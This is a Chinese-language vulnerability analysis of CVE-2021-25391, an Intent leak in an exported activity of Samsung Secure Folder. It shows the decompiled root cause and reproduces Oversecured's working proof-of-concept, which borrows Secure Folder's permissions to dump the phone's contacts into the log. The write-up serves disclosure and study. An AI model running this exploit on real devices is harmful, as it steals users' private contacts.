[CVE-2021-25391] [Samsung] [Secure Folder] KnoxSettingCheckLockTypeActivity泄露Intent可获取ContentProvider数据
Date
Version
Description
Author
2022.11.20
1.0
完整的漏洞分析与利用
wnagzihxa1n
0x00 漏洞概述
这个漏洞我没有完全自己挖出来,分析代码的时候我能感觉这个写法有问题,但一开始没有理解这个漏洞模型
三星手机系统的Secure Folder存在Intent泄露,合理构造Intent,可以获取到其权限
0x01 触发条件
上线日期
应用名
包名
版本号
MD5
下载链接
Secure Folder
com.samsung.knox.securefolder
1.6.01.61
67bc4cec5ab436e1711cc98c43cc417e
0x02 PoC
0x03 前置知识
0x04 Root Cause Analysis
组件com.samsung.knox.securefolder.containeragent.ui.settings.KnoxSettingCheckLockTypeActivity
导出
<activity
android:exported="true"
android:launchMode="singleTask"
android:name="com.samsung.knox.securefolder.containeragent.ui.settings.KnoxSettingCheckLockTypeActivity"
android:resizeableActivity="false"
android:taskAffinity="com.samsung.knox.securefolder"/>
[1]
将传入的Intent又发送了出去,所以我们就获取到了一个属于Secure Folder的Intent,合理构造这个Intent可以让攻击者获取到Secure Folder的权限
// com.samsung.knox.securefolder.containeragent.ui.settings.KnoxSettingCheckLockTypeActivity
@Override // android.app.Activity
protected void onCreate(Bundle bundle) {
super.onCreate(bundle);
Log.d(KnoxSettingCheckLockTypeActivity.TAG, "KnoxSettingCheckLockTypeActivity onCreate in overlay_post_container_v24");
this.mChooseLockSettingshelper = new KnoxSettingsChooseLockSettingsHelper(this);
int bundle = (((DevicePolicyManager)this.getSystemService("device_policy")).getKeyguardDisabledFeatures(null) & 16) == 0 ? 1 : 0;
Log.d(KnoxSettingCheckLockTypeActivity.TAG, "KnoxSettingCheckLockTypeActivity onCreate come from trust agent. isAllowed: " + ((boolean)bundle));
if(bundle != 0) {
boolean z = this.mChooseLockSettingshelper.launchConfirmationActivity(0x409, null, null);
Log.d(KnoxSettingCheckLockTypeActivity.TAG, "KnoxSettingCheckLockTypeActivity onCreate result: " + ((boolean)(((int)z))));
return;
}
Log.d(KnoxSettingCheckLockTypeActivity.TAG, "KnoxSettingCheckLockTypeActivity onCreate send intent back");
this.setResult(0, this.getIntent()); // [1]
this.finish();
}
0x05 调试与利用
Oversecured实验室的PoC,我也是学到了很多
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Intent i = new Intent();
i.setClassName("com.samsung.knox.securefolder", "com.samsung.knox.securefolder.containeragent.ui.settings.KnoxSettingCheckLockTypeActivity");
i.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
i.setData(ContactsContract.RawContacts.CONTENT_URI);
startActivityForResult(i, 0);
}
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
super.onActivityResult(requestCode, resultCode, data);
dump(data.getData());
}
private void dump(Uri uri) {
Cursor cursor = getContentResolver().query(uri, null, null, null, null);
if (cursor.moveToFirst()) {
do {
StringBuilder sb = new StringBuilder();
for (int i = 0; i < cursor.getColumnCount(); i++) {
if (sb.length() > 0) {
sb.append(", ");
}
sb.append(cursor.getColumnName(i) + " = " + cursor.getString(i));
}
Log.d("evil", sb.toString());
}
while (cursor.moveToNext());
}
}
0x06 漏洞研究
0x07 References
《Two weeks of securing Samsung devices: Part 1》
https://blog.oversecured.com/Two-weeks-of-securing-Samsung-devices-Part-1/
附录:调试过程记录
Previous[CVE-2021-25390] [Samsung] [Photo Table] PermissionsRequestActivity存在任意私有组件启动漏洞可获取ContentProvider数据Next[CVE-2021-25397] [Samsung] [TelephonyUI] PhotoringReceiver导出存在任意文件写漏洞结合动态库加载行为可实现本地任意代码执行
Last updated